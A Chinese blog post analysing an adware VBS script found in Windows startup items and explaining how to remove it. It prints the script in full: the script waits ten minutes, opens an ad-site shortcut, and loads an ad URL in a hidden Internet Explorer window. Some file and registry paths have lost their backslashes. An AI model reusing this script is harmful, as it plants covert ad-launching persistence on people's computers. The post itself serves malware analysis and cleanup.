当前位置:编程学习 > 网站相关 >>

自动弹出网页的恶意脚本分析

by:riusksk
blog:http://riusksk.blogbus.com

这几天在开机后,都会自动弹出一个广告网站,在注册表中搜索弹出的网页,无果而返,接着再看了一下启动项,发现个VBS脚本文件,如下图:
\ 点击查看原始尺寸


找到这个脚本文件后,用记事本打开,代码如下:

00000: On Error Resume Next
00001: Dim Fso,wss,HKRegStr
00002: Set Fso= CreateObject("Scripting.FileSystemObject")
00003: Set wss=CreateObject("WScript.Shell")
00004: HKRegStr=wss.RegRead("HKEY_CURRENT_USERSoftwareMaxthon2Folder")
00005: if HKRegStr<>"" then
00006: HKRegStr=HKRegStr+"Maxthon.exe"     默认使用傲游浏览器打开网站
00007: if (Fso.FileExists(HKRegStr)) then
00008: wscript.sleep 600000        脚本运行10分钟之后再打开网站
00009: 网址之家.url是一个快捷方式文件,指向http://www.so02.cn/?sid=1,如下图所示:
\ QQ截图未命名.jpg


00010: CreateObject("WScript.Shell").run """" & HKRegStr &""" C:Windowssystem32网址之家.url",x,ture   
00011: set ie=WScript.createobject("internetexplorer.application")
00012: ie.visible = 0
00013: ie.navigate "http://qw.ad29.com/ji.asp"                接着再打开这个网址
00014: wscript.sleep 10000        暂时10秒
00015: ie.quit
00016: else
00017: 假如没有注册表中指定的Maxthon.exe,则用默认浏览器打开网址之家.url,也就是http://www.so02.cn/?sid=1
00018: wscript.sleep 600000
00019: CreateObject("WScript.Shell").run" C:Windowssystem32网址之家.url",x,ture       
00020: end if
00021: else
00022: 假如注册表HKEY_CURRENT_USERSoftwareMaxthon2Folder无键值,则10分钟后打开网址之家.url
00023: wscript.sleep 600000
00024: CreateObject("WScript.Shell").run "C:Windowssystem32网址之家.url" ,x,ture
00025: end if

清除方法:去掉启动项中的网址之家.vbs并将其删除,再将 C:Windowssystem32网址之家.url 也清除,重启之后搞定。

补充:综合编程 , 安全编程 ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,